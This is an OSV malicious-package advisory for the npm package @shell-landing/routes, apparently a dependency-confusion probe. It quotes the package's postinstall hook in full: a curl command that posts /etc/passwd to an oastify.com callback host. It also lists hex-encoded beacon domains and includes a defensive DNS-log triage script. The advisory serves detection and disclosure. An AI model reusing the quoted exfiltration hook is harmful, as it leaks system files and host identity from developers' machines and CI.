MAL-2026-5429

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5429
Published
2026-06-09T17:19:00Z
Modified
2026-06-09T18:01:32.742969114Z
Summary
Malicious code in @shell-landing/routes (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577)

On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com. The curl invocation POSTs the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain, embedding the installer's hostname in the request. The companion script scripts/scream3gg.js hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and beacons each as an HTTP GET subdomain of *.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com. The package contains no library code, no README, and no main entry — version 99.9.5 with a pure-exfil payload under the @shell-landing scope is consistent with a dependency-confusion probe targeting an internal package name. Any developer or CI running npm install will leak host identity and /etc/passwd to attacker infrastructure.
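For triaging DNS logs against this record, the sketch below (an added example, not code from the package, the advisory, or the reporting source) finds queried names under oastify.com and hex-decodes the leading label the way scripts/scream3gg.js is described as encoding it. The function names and the build-agent-07 and registry.npmjs.org entries are constructed for illustration; the other names are the ones this record lists.

```javascript
// Added example for log triage; not code from the package or the advisory.
const CALLBACK_SUFFIX = ".oastify.com"; // callback parent domain named in the record

// Decode a label only when it is even-length hex that yields printable ASCII.
function decodeHexLabel(label) {
  if (!/^(?:[0-9a-f]{2})+$/.test(label)) return null;
  const text = Buffer.from(label, "hex").toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Map queried DNS names to findings: which callback ID was hit and what leaked.
function triageQueries(names) {
  const findings = [];
  for (const raw of names) {
    const name = raw.trim().toLowerCase().replace(/\.$/, "");
    if (!name.endsWith(CALLBACK_SUFFIX)) continue;
    const labels = name.slice(0, -CALLBACK_SUFFIX.length).split(".");
    if (labels.length < 2) continue; // no data label in front of the callback ID
    const callbackId = labels.pop();
    const data = labels.join("."); // a plain FQDN may span several labels
    // decoded stays null for the curl path, which sends the hostname unencoded.
    findings.push({ query: name, callbackId, data, decoded: decodeHexLabel(data) });
  }
  return findings;
}

// Sample log input: the first three names are this record's indicators.
const SAMPLE_QUERIES = [
  "7363616e2d353265363663323431616637.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
  "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
  "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
  "build-agent-07.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com.", // constructed
  "registry.npmjs.org", // constructed, unrelated traffic
];

for (const f of triageQueries(SAMPLE_QUERIES)) {
  const kind = f.decoded ? "hex-decoded" : "plain";
  console.log(`${f.callbackId}: ${f.decoded ?? f.data} (${kind})`);
}
```

A finding with a non-null decoded value shows which host identity field left the machine; a plain data label under the second callback ID corresponds to the curl request that also carried /etc/passwd.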

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:19:00Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577",
            "id": "IN-MAL-2026-005027",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.873904036Z"
        },
        {
            "modified_time": "2026-06-09T17:19:01Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "75491d01c9adcd8b4ea3535f0aed57f3763c03e1375e84b1a20cec842ae6d5b2",
            "id": "IN-MAL-2026-005028",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.905899507Z"
        }
    ]
}
References
Credits

Affected packages

npm / @shell-landing/routes

Package

Name
@shell-landing/routes
Purl
pkg:npm/%40shell-landing%2Froutes

Affected ranges

Affected versions

99.*
99.9.5

Database specific

indicators
{
    "domains": [
        "7363616e2d353265363663323431616637.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "b16d6e964a35304d2c3ab4c01fc722bd45b49c36a61c9282364719a236a8e741",
            "tlsh": "74d0a7b07800c6737acd06a38128a1457955c85b1214b96246df87e4912436174e6506",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "routes-99.9.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-hjqjPpc4nwEToGMYjs7AgvTToo5ElKYbb4ne8S18NSfwJ7rg5BUMEll/iYjPncsCnh844HTikoYzowfp0hCqlA==",
                "sha1": "f369c3ef9e1f43b4f9bcaa6f25e011336d8af992"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shell-landing/routes/MAL-2026-5429.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]